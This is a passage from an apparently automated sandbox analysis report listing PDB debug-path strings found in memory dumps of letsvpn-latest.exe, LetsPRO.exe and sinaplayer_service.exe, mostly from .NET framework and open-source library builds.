              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Xml/net461-windows-Release/System.Security.Cryptography.Xml.pdb source: letsvpn-latest.exe, 00000015.00000003.2481329381.000000000310C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\Users\Todd\Source\Repos\DeltaCompressionDotNet\DeltaCompressionDotNet.PatchApi\obj\Release\DeltaCompressionDotNet.PatchApi.pdb source: letsvpn-latest.exe, 00000015.00000003.2348561937.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\obj\Release\net40\Mono.Cecil.pdb source: letsvpn-latest.exe, 00000015.00000003.2379243714.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection\4.1.2.0\System.Reflection.pdb source: letsvpn-latest.exe, 00000015.00000003.2459017919.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\cb\bld\bin\e_sqlite3\win\v141\plain\x64\e_sqlite3.pdb source: letsvpn-latest.exe, 00000015.00000003.2544780901.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.NetTcp.Facade/Release/net461/System.ServiceModel.NetTcp.pdb source: letsvpn-latest.exe, 00000015.00000003.2486208547.000000000310D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\wpf_control\Microsoft.Web.WebView2.Wpf\obj\release\net45\Microsoft.Web.WebView2.Wpf.pdbon source: letsvpn-latest.exe, 00000015.00000003.2373633715.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Encoding\4.0.2.0\System.Security.Cryptography.Encoding.pdb source: letsvpn-latest.exe, 00000015.00000003.2478011371.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.batteries_v2.e_sqlite3.dynamic\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdb source: letsvpn-latest.exe, 00000015.00000003.2384419249.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Duplex.Facade/Release/net461/System.ServiceModel.Duplex.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2484710672.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Diagnostics.StackTrace/netfx\System.Diagnostics.StackTrace.pdb source: letsvpn-latest.exe, 00000015.00000003.2413846531.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Diagnostics.Tracing/netfx\System.Diagnostics.Tracing.pdb'MAM 3M_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2420810198.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Debug\4.0.11.0\System.Diagnostics.Debug.pdb source: letsvpn-latest.exe, 00000015.00000003.2409981035.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: FileDescriptionMono.Cecil.Pdb2 source: letsvpn-latest.exe, 00000015.00000003.2377740125.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.batteries_v2.e_sqlite3.dynamic\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2384419249.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Mannelig\Dev\Projects\NET\WpfToastNotifications\Src\ToastNotifications\obj\Release\ToastNotifications.pdb source: letsvpn-latest.exe, 00000015.00000003.2511086814.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenterCrashes\Microsoft.AppCenter.Crashes.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Crashes.pdb source: letsvpn-latest.exe, 00000015.00000003.2368187744.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\Tommy\Documents\GitHub\Font-Awesome-WPF\src\WPF\FontAwesome.WPF\bin\Signed-Net40\FontAwesome.WPF.pdb source: letsvpn-latest.exe, 00000015.00000003.2350184994.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Drawing.Common/net461-Release/System.Drawing.Common.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2421605703.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Csp\4.0.2.0\System.Security.Cryptography.Csp.pdb4)N) @)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2477452531.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\GitWorkspace\AvalonEdit\ICSharpCode.AvalonEdit\obj\Release\net45\ICSharpCode.AvalonEdit.pdb source: letsvpn-latest.exe, 00000015.00000003.2352114533.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\winforms_control\Microsoft.Web.WebView2.WinForms\obj\release\net45\Microsoft.Web.WebView2.WinForms.pdb source: letsvpn-latest.exe, 00000015.00000003.2372959947.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Microsoft.Cci.Pdb source: letsvpn-latest.exe, 00000015.00000003.2377740125.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Pipes\4.0.2.0\System.IO.Pipes.pdbh) source: letsvpn-latest.exe, 00000015.00000003.2433680162.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Text.Encoding.CodePages/net461-windows-Release/System.Text.Encoding.CodePages.pdb source: letsvpn-latest.exe, 00000015.00000003.2489791226.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Security\4.0.2.0\System.Net.Security.pdbT*n* `*_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2452861918.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\cb\bld\bin\e_sqlite3\win\v141\plain\arm\e_sqlite3.pdb source: letsvpn-latest.exe, 00000015.00000003.2542712348.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.ThreadPool\4.0.12.0\System.Threading.ThreadPool.pdb source: letsvpn-latest.exe, 00000015.00000003.2497068507.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\Microsoft.Win32.Primitives\4.0.3.0\Microsoft.Win32.Primitives.pdb|( source: letsvpn-latest.exe, 00000015.00000003.2374293880.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\IEUser\pusher-websocket-dotnet\PusherClient\obj\release\net46\PusherClient.pdb source: letsvpn-latest.exe, 00000015.00000003.2381608570.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\StubExecutable.pdb source: letsvpn-latest.exe, 00000015.00000003.2346711845.000000000310D000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003A.00000000.2692956022.000000000069D000.00000002.00000001.01000000.00000018.sdmp, LetsPRO.exe, 0000003A.00000002.2702950830.000000000069D000.00000002.00000001.01000000.00000018.sdmp, LetsPRO.exe, 0000003C.00000000.2777222933.000000000069D000.00000002.00000001.01000000.00000018.sdmp, LetsPRO.exe, 0000003C.00000002.2785001894.000000000069D000.00000002.00000001.01000000.00000018.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Tools\4.0.1.0\System.Diagnostics.Tools.pdb source: letsvpn-latest.exe, 00000015.00000003.2415443172.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.Packaging/net461-Release/System.IO.Packaging.pdb source: letsvpn-latest.exe, 00000015.00000003.2432280356.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Threading.Overlapped/netfx\System.Threading.Overlapped.pdb source: letsvpn-latest.exe, 00000015.00000003.2492960900.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\LetsVPNDomainModel\obj\Release\LetsVPNDomainModel.pdb+CEC 7C_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2365247282.0000000003100000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000002.2707740926.0000000002B62000.00000002.00000001.01000000.0000001D.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry/net461-Windows_NT-Release/Microsoft.Win32.Registry.pdb source: letsvpn-latest.exe, 00000015.00000003.2375723278.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Runtime.Serialization.Xml/netfx\System.Runtime.Serialization.Xml.pdb source: letsvpn-latest.exe, 00000015.00000003.2469202106.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlSerializer\4.0.11.0\System.Xml.XmlSerializer.pdbt+ source: letsvpn-latest.exe, 00000015.00000003.2509600299.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Globalization\4.0.11.0\System.Globalization.pdb source: letsvpn-latest.exe, 00000015.00000003.2425036584.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.NameResolution\4.0.2.0\System.Net.NameResolution.pdb|( source: letsvpn-latest.exe, 00000015.00000003.2449120272.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Timer\4.0.1.0\System.Threading.Timer.pdb source: letsvpn-latest.exe, 00000015.00000003.2501476791.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Parallel\4.0.1.0\System.Linq.Parallel.pdb source: letsvpn-latest.exe, 00000015.00000003.2437674075.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Security.Cryptography.Algorithms/netfx\System.Security.Cryptography.Algorithms.pdb source: letsvpn-latest.exe, 00000015.00000003.2476535630.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.Primitives\4.1.2.0\System.ComponentModel.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2400273396.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.provider.dynamic_cdecl\obj\Release\netstandard2.0\SQLitePCLRaw.provider.dynamic_cdecl.pdb source: letsvpn-latest.exe, 00000015.00000003.2386682491.0000000003104000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003D.00000002.3444226642.00000000590F2000.00000002.00000001.01000000.0000002F.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/net461-Release/Microsoft.Bcl.AsyncInterfaces.pdb source: letsvpn-latest.exe, 00000015.00000003.2369792600.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/net461-windows-Release/System.Security.Cryptography.ProtectedData.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2479924642.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XPath\4.0.3.0\System.Xml.XPath.pdb source: letsvpn-latest.exe, 00000015.00000003.2508023924.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sharpcompress\src\SharpCompress\obj\Release\net45\SharpCompress.pdb source: letsvpn-latest.exe, 00000015.00000003.2388904149.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\obj\Squirrel\Release\net45\Squirrel.pdb source: letsvpn-latest.exe, 00000015.00000003.2393237093.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.CompilerServices.VisualC\4.0.2.0\System.Runtime.CompilerServices.VisualC.pdb@*Z* L*_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2463035170.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Runtime.Serialization.Primitives/netfx\System.Runtime.Serialization.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2468439882.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcr120.i386.pdb source: sinaplayer_service.exe, sinaplayer_service.exe, 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Principal\4.0.1.0\System.Security.Principal.pdb source: letsvpn-latest.exe, 00000015.00000003.2483409746.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcp120.i386.pdb source: sinaplayer_service.exe, 00000013.00000002.3394803400.000000006E531000.00000020.00000001.01000000.0000000D.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Diagnostics.Tracing/netfx\System.Diagnostics.Tracing.pdb source: letsvpn-latest.exe, 00000015.00000003.2420810198.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime\4.1.2.0\System.Runtime.pdb source: letsvpn-latest.exe, 00000015.00000003.2469936140.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Runtime.InteropServices.RuntimeInformation\net462\System.Runtime.InteropServices.RuntimeInformation.pdbxE source: letsvpn-latest.exe, 00000015.00000003.2464968959.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Writer\4.0.2.0\System.Resources.Writer.pdbl( source: letsvpn-latest.exe, 00000015.00000003.2461540941.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection\4.1.2.0\System.Reflection.pdbH,b, T,_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2459017919.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Numerics\4.0.1.0\System.Runtime.Numerics.pdb|( source: letsvpn-latest.exe, 00000015.00000003.2466277974.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\wpfanimatedgif\WpfAnimatedGif\obj\Release\net40\WpfAnimatedGif.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2513494263.0000000003103000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.RegularExpressions\4.1.1.0\System.Text.RegularExpressions.pdb source: letsvpn-latest.exe, 00000015.00000003.2491542161.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Ping\4.0.2.0\System.Net.Ping.pdb source: letsvpn-latest.exe, 00000015.00000003.2450779209.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Duplex.Facade/Release/net461/System.ServiceModel.Duplex.pdb source: letsvpn-latest.exe, 00000015.00000003.2484710672.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Contracts\4.0.1.0\System.Diagnostics.Contracts.pdb source: letsvpn-latest.exe, 00000015.00000003.2408687064.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/net461-Release/Microsoft.Bcl.AsyncInterfaces.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2369792600.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: WebView2Loader.dll.pdb source: letsvpn-latest.exe, 00000015.00000003.2548790969.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry.AccessControl/net461-windows-Release/Microsoft.Win32.Registry.AccessControl.pdb source: letsvpn-latest.exe, 00000015.00000003.2374971901.000000000310C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\MdXaml\artifacts\obj\MdXaml\Release\net45\MdXaml.pdbSHA256/T source: letsvpn-latest.exe, 00000015.00000003.2366742475.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: netstandard.pdb.mdb source: letsvpn-latest.exe, 00000015.00000003.2345688003.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2379243714.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Primitives\4.0.2.0\System.Security.Cryptography.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2479247746.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/net461-Release/System.Diagnostics.EventLog.pdbSHA256~ source: letsvpn-latest.exe, 00000015.00000003.2410824087.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Security.SecureString/netfx\System.Security.SecureString.pdbf) source: letsvpn-latest.exe, 00000015.00000003.2484061202.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.InteropServices\4.1.2.0\System.Runtime.InteropServices.pdbH5b5 T5_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2465608542.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.TextWriterTraceListener\4.0.2.0\System.Diagnostics.TextWriterTraceListener.pdb source: letsvpn-latest.exe, 00000015.00000003.2414685482.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Reader\4.0.2.0\System.Resources.Reader.pdbl( source: letsvpn-latest.exe, 00000015.00000003.2459711071.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\pdb\obj\Release\net40\Mono.Cecil.Pdb.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2377740125.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Web.Services.Description/Release/net461/System.Web.Services.Description.pdb source: letsvpn-latest.exe, 00000015.00000003.2503983529.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.IsolatedStorage\4.0.2.0\System.IO.IsolatedStorage.pdb source: letsvpn-latest.exe, 00000015.00000003.2430770460.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Xml.XPath.XDocument/netfx\System.Xml.XPath.XDocument.pdb source: letsvpn-latest.exe, 00000015.00000003.2507336044.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.Odbc/net461-windows-Release/System.Data.Odbc.pdb source: letsvpn-latest.exe, 00000015.00000003.2405745648.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Extract: Mono.Cecil.Pdb.dll... 100% source: letsvpn-latest.exe, 00000015.00000003.2479823964.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2410726668.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2482021490.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2405363721.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2552202031.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2400183214.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2532985438.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2469825366.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2534389095.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2421492280.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2385920411.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2384309605.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2423603641.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2466824384.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2485267390.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2413753120.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2404073971.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2412990203.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2524775630.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2536677390.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2459579593.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2468327085.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2398894542.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2425615678.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2448284648.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2466166258.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2424274509.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.24
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.X509Certificates\4.1.2.0\System.Security.Cryptography.X509Certificates.pdb source: letsvpn-latest.exe, 00000015.00000003.2480592822.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Expressions\4.1.2.0\System.Linq.Expressions.pdb source: letsvpn-latest.exe, 00000015.00000003.2436998881.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Csp\4.0.2.0\System.Security.Cryptography.Csp.pdb source: letsvpn-latest.exe, 00000015.00000003.2477452531.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensionsAsync\obj\Release\netstandard1.1\SQLiteNetExtensionsAsync.pdb source: letsvpn-latest.exe, 00000015.00000003.2383763587.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\wpf_control\Microsoft.Web.WebView2.Wpf\obj\release\net45\Microsoft.Web.WebView2.Wpf.pdb source: letsvpn-latest.exe, 00000015.00000003.2373633715.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Xml/net461-windows-Release/System.Security.Cryptography.Xml.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2481329381.000000000310C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Requests\4.0.11.0\System.Net.Requests.pdbX)r) d)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2452215583.000000000310D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\Users\Todd\Source\Repos\DeltaCompressionDotNet\DeltaCompressionDotNet\obj\Release\DeltaCompressionDotNet.pdb source: letsvpn-latest.exe, 00000015.00000003.2349256901.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Buffers\netfx\System.Buffers.pdb source: letsvpn-latest.exe, 00000015.00000003.2394947957.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Encoding\4.0.2.0\System.Security.Cryptography.Encoding.pdbT)n) `)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2478011371.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Threading.Tasks.Extensions\netfx\System.Threading.Tasks.Extensions.pdb source: letsvpn-latest.exe, 00000015.00000003.2493596023.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenterCrashes\Microsoft.AppCenter.Crashes.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Crashes.pdbSHA256, source: letsvpn-latest.exe, 00000015.00000003.2368187744.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.AppContext\4.1.2.0\System.AppContext.pdb<(V( H(_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2394362077.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb source: letsvpn-latest.exe, 00000015.00000003.2413088913.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Primitives.Facade/Release/net461/System.ServiceModel.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2486911961.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceProcess.ServiceController/net461-windows-Release/System.ServiceProcess.ServiceController.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2488820018.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\WorkShop\WebSocket4Net\WebSocket4Net\obj\Release\WebSocket4Net.pdb* source: letsvpn-latest.exe, 00000015.00000003.2512523323.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Cng/net462-Windows_NT-Release/System.Security.Cryptography.Cng.pdbSHA256,C+U7 source: letsvpn-latest.exe, 00000015.00000003.2476891907.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\WorkShop\SuperSocket.Clientuser\obj\Release\SuperSocket.Clientuser.pdbR source: letsvpn-latest.exe, 00000015.00000003.2393796689.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Queryable\4.0.1.0\System.Linq.Queryable.pdb source: letsvpn-latest.exe, 00000015.00000003.2438332844.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2380231891.0000000003105000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000002.2711648046.0000000005742000.00000002.00000001.01000000.0000001E.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlDocument\4.0.3.0\System.Xml.XmlDocument.pdb source: letsvpn-latest.exe, 00000015.00000003.2508751976.0000000003109000.00000004.00000020.00020000.00000000.sdmp
